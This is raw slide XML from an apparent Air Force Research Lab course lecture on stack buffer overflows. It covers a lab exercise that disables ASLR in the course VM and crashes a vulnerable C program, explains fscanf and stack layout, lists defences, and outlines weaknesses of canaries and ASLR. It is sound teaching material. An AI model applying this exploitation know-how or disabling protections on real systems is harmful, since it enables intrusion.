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</p:sldIdLst>
  <p:sldSz cy="6858000" cx="12192000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Century Schoolbook"/>
      <p:regular r:id="rId110"/>
      <p:bold r:id="rId111"/>
      <p:italic r:id="rId112"/>
      <p:boldItalic r:id="rId113"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Noto Sans Symbols"/>
      <p:regular r:id="rId114"/>
      <p:bold r:id="rId1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6" roundtripDataSignature="AMtx7mgFSTkHH+WHVRjjBmlkZxwXw1yg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699E51E-27AD-45A0-8260-30540317AD18}">
  <a:tblStyle styleId="{2699E51E-27AD-45A0-8260-30540317AD18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6" Type="http://customschemas.google.com/relationships/presentationmetadata" Target="metadata"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NotoSansSymbols-bold.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CenturySchoolbook-regular.fntdata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font" Target="fonts/NotoSansSymbols-regular.fntdata"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CenturySchoolbook-boldItalic.fntdata"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CenturySchoolbook-italic.fntdata"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CenturySchoolbook-bold.fntdata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e5311e72c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e5311e72c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4e5311e72c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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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8" name="Google Shape;1108;p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e5311e72c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e5311e72c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4e5311e72c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e5311e72c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e5311e72c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4e5311e72c_0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e5311e72c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e5311e72c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4e5311e72c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e5311e72c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e5311e72c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4e5311e72c_0_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e5311e72c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4e5311e72c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4e5311e72c_0_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e5311e72c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4e5311e72c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4e5311e72c_0_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e5311e72c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4e5311e72c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4e5311e72c_0_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4e5311e72c_0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4e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_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4e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_1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24e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_1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24e5311e72c_0_1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4e5311e72c_0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4e5311e72c_0_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24e5311e72c_0_1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4e5311e72c_0_1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4e5311e72c_0_1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24e5311e72c_0_1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4e5311e72c_0_2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4e5311e72c_0_2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24e5311e72c_0_2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4e5311e72c_0_2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4e5311e72c_0_2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24e5311e72c_0_2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4e5311e72c_0_2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4e5311e72c_0_2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24e5311e72c_0_2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4e5311e72c_0_2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4e5311e72c_0_2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24e5311e72c_0_2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4e5311e72c_0_2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4e5311e72c_0_2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24e5311e72c_0_2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e5311e72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e5311e72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4e5311e72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4e5311e72c_0_2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4e5311e72c_0_2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24e5311e72c_0_2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4e5311e72c_0_2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4e5311e72c_0_2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24e5311e72c_0_2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4e5311e72c_0_3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4e5311e72c_0_3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24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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g24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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g24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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g24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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24e5311e72c_0_3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4e5311e72c_0_3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4e5311e72c_0_3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g24e5311e72c_0_3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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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4e5311e72c_0_4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4e5311e72c_0_4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24e5311e72c_0_4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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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e5311e72c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e5311e72c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4e5311e72c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4e5311e72c_0_4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4e5311e72c_0_4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g24e5311e72c_0_4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4e5311e72c_0_5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4e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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4e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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4e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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4e5311e72c_0_5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g24e5311e72c_0_5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24e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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4e5311e72c_0_5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g24e5311e72c_0_5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e5311e72c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e5311e72c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4e5311e72c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4e5311e72c_0_5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4e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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4e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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24e5311e72c_0_5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24e5311e72c_0_5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g24e5311e72c_0_5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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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e5311e72c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e5311e72c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4e5311e72c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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_6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24e5311e72c_0_6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g24e5311e72c_0_6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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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4e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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4e5311e72c_0_7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4e5311e72c_0_7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g24e5311e72c_0_7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e5311e72c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e5311e72c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4e5311e72c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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_7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24e5311e72c_0_7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g24e5311e72c_0_7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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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e5311e72c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e5311e72c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4e5311e72c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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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24e5311e72c_0_8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24e5311e72c_0_8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g24e5311e72c_0_8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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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24e5311e72c_0_9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24e5311e72c_0_9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g24e5311e72c_0_9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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4864230" y="1122363"/>
            <a:ext cx="5803769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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4864230" y="3602038"/>
            <a:ext cx="5803769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8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" name="Google Shape;26;p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6379" y="1342430"/>
            <a:ext cx="4869673" cy="4869673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection blurRad="0" dir="0" dist="0" endA="300" endPos="55000" kx="0" rotWithShape="0" algn="bl" stA="50000" stPos="0" sy="-100000" ky="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Google Shape;27;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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Advanced Course in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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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9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9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9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9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9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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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8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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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9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9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9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9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9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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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9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9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9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9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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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mage result for air force research lab" id="15" name="Google Shape;15;p8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120101" y="115909"/>
            <a:ext cx="1021500" cy="1016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398" y="115910"/>
            <a:ext cx="1053718" cy="10537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Google Shape;17;p87"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3263" y="1187779"/>
            <a:ext cx="12185473" cy="37707"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="5715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" name="Google Shape;18;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="28281"/>
            <a:ext cx="12188736" cy="115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UNCLASSIFIED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87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6705600"/>
            <a:ext cx="12188736" cy="115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UNCLASSIFIED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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe.callen14@gmail.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joseph.callen@us.af.mi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shell-storm.org/shellcode" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com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nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/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://www.xkcd.com/comic.jpg" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="about:blank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4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4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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5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6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20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4864230" y="1122363"/>
            <a:ext cx="5803769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Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4864230" y="3602038"/>
            <a:ext cx="5803769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Joseph Callen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Captain, USAFR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e5311e72c_0_41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Assumptions	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;g24e5311e72c_0_4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Remote and/or local interactions with target machine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Terminal or input field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Network connection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File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Vulnerable software on target machine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Stack-based buffer overflow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Unintended information disclosure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24e5311e72c_0_928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Preventing Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;g24e5311e72c_0_9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 equivalent “safe functions”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strncpy(), strncat(), snprintf(), vsvprintf()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Do not derive data size from user input or enforce a maximum size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Even with a “safe” function, if the user specifies data size and the destination buffer is static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 an interpreted or type safe language (e.g. Python, .Net, Java, Ruby)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Not entirely immune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Not always optimal due to other constraints (performance, memory,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Enable defense mechanisms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DEP, canaries, ASLR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others?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24e5311e72c_0_934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Risk Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;g24e5311e72c_0_93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Vulnerabilities are not going anywhere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Most programmers are not educated on secure coding practices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Just look at your own code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Safer functions introduced in later revisions of the C Standard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Legacy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There is a lot of software in use that is open source (e.g. Linux kernel, Mozilla Firefox, etc)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New functionality is ripe for the picking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Closed source applications are not immune to exploitation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Reverse engineering and fuzz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Static analysis tools allow you to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> faster, but usually only catch all the low-hanging fruit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24e5311e72c_0_940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Risk Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Google Shape;1098;g24e5311e72c_0_940"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="478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Reliable exploitation of software on modern systems ay require presence of two vulnerabilities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Buffer overflow and unintended information disclosure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Recent paper on defeating “equivalent” Windows defenses [9]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Canary Values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Terminator canaries restrict overflows from null-terminated operations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Function calls use the same canary value determined at start of program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Forked processes have identical memory layout and hence same canary values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Brute force state space is reduced by guessing one byte at a time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Non-Stack based overflows (heap-based or function pointers) are not protected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ASLR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Libraries must be loaded at fixed locations in certain cases (e.g MSCOMCTL.dll for Office 2010 or earlier)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Forked processes have identical memory layout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Brute force is feasible for 32-bit applications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24e5311e72c_0_946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105" name="Google Shape;1105;g24e5311e72c_0_94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265" lvl="0" marL="431165" marR="64897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Aleph One. Smashing the stack for fun and profit. Phrack Magazine, 49(14), November 1996.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265" lvl="0" marL="431165" rtl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J. Erickson. Hacking: the art of exploitation, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en-US" sz="1800">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>nd 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Ed, 2008.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265" lvl="0" marL="431165" marR="537210" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="116666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="49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H. Shacham, et al. On the effectiveness of address-space randomization, CCS 2004.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265" lvl="0" marL="431165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T. Durden. Bypassing PaX ASLR Protection. Phrack Magazine, 59(9), June 2002.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265" lvl="0" marL="431165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W. Du. SEED Laboratory, Syracuse University.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265" lvl="0" marL="431165" marR="347345" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="116666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495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T. Muller. ASLR smack and laugh reference: seminar on advanced exploitation techniques, RWTH Aachen University, 2008.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265" lvl="0" marL="431165" marR="323215" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="116666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="43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Nergal. Advanced return-into-libc exploits. Phrack Magazine, 58(4), December 2001.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265" lvl="0" marL="431165" marR="843280" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="116666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="43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H. Shacham. The geometry of innocent flesh on the bone: return-into-libc without function calls (on the x86), CCS 2007.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265" lvl="0" marL="431165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J. DeMott. Bypassing EMET 4.1, Bromium Labs, 2014.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84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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1111" name="Google Shape;1111;p8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Joseph Callen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Email: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joe.callen14@gmail.com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Mil Email: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joseph.callen@us.af.mil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Slack/Discord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e5311e72c_0_47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Start Environment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;g24e5311e72c_0_4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Start virtual machine: (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>Should have </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>received</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t> instructions for access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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Username: user (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>ACE User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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password: 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Open terminal and disable ASLR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CTRL+ALT+T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sudo sysctl kernel.randomize_va_space=0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restore with “=2”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Reverts on machine restart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directory “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~/ACE_2023/distro/memcor/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>” contains all the example programs  for this lecture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cd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~/ACE_2023/distro/memcor/[example]/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 makefile is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>included</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> in each example directory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Compile programs using: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make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e5311e72c_0_53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Exercise: readData0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;g24e5311e72c_0_5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Objective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Crash the program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Determine cause of error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Procedure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Compile and run program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make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./readData0 input.txt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Examine code and speculate on behavoir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code readData0.c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Hint: Provide different types and sizes of input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echo “AAAA” &gt; input.txt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echo “AAAAAAAAA….AA” &gt; input.txt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e5311e72c_0_59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Tale of Assumptions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;g24e5311e72c_0_5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-US" sz="2700"/>
              <a:t>fscanf(filePointer, “%s”, dataBuffer);</a:t>
            </a:r>
            <a:endParaRPr sz="2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2300"/>
              <a:t>Copies a sequence of bytes from the input file to the destination data buffer</a:t>
            </a:r>
            <a:endParaRPr sz="23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2300"/>
              <a:t>The format specifier “%s” specifies to read bytes that represent non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>whitespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t> character strings</a:t>
            </a:r>
            <a:endParaRPr sz="2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2700"/>
              <a:t>A string is a null-terminated character array</a:t>
            </a:r>
            <a:endParaRPr sz="2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2300"/>
              <a:t>Char* myString = “HelloWorld!”;</a:t>
            </a:r>
            <a:endParaRPr sz="23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2300"/>
              <a:t>“HelloWorld!” is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>represented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t> with 12 characters</a:t>
            </a:r>
            <a:endParaRPr sz="23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2300"/>
              <a:t>Ends with a Null Character</a:t>
            </a:r>
            <a:endParaRPr sz="2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3" name="Google Shape;183;g24e5311e72c_0_59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="879150" y="457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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1828800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="1695450"/>
                <a:gridCol w="1733550"/>
              </a:tblGrid>
              <a:tr h="30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Index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 (ASCII)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 (hex)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 (binary)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34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myString[0]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92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0x48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92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01001000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92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33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myString[1]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4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65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0x65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65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01100101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65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33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65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65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65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65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33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myString[11]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4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65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0x21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65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00100001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65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33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myString[12]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4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NULL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65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0x00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65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00000000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65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e5311e72c_0_67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 Tale of Assumptions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;g24e5311e72c_0_67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="478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64285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fscanf()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will copy bytes from the input file until it reads NULL (0x00) or a delimiter character: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What if the number of valid characters exceeds the size of the allocated memory for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dataBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>?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Many copy functions rely on similar assumptions, although the delimiter characters may differ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g24e5311e72c_0_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1152" y="2669101"/>
            <a:ext cx="2935884" cy="1663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4e5311e72c_0_74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Segmentation Fault</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;g24e5311e72c_0_7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Occurs when a program attempts to access (read or write) memory outside of its allowed address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Why did our program segfault?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Control information was overwritten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Could we overwrite control flow information with data of our choosing?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4e5311e72c_0_80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Computer Architecture Concepts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;g24e5311e72c_0_8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Memory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Stores data and program instructions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Registers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Special high-speed storage separate from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Central Processing Unit (CPU)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Executes program instructions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Moves data to/from memory or registers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Stack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Reserved region in memory used for temporarily storing data and control flow information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4e5311e72c_0_86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Memory (32-bit system)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="212" name="Google Shape;212;g24e5311e72c_0_86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5251703" y="1562100"/>
            <a:ext cx="1421764" cy="3924299"/>
            <a:chOff x="3880103" y="1257300"/>
            <a:chExt cx="1421764" cy="3924299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Google Shape;213;g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="1257300"/>
              <a:ext cx="1421764" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="678180" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="678179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="6325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g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="1935480"/>
              <a:ext cx="1421764" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="678180" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E46C0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g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="2613660"/>
              <a:ext cx="1421764" cy="1828800"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1828800" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="0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g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="4442460"/>
              <a:ext cx="1421764" cy="739139"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="739139" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="739139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="739139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142123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g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4098977" y="1261876"/>
            <a:ext cx="9405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200">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="431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0xfffffffc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g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583803" y="1278830"/>
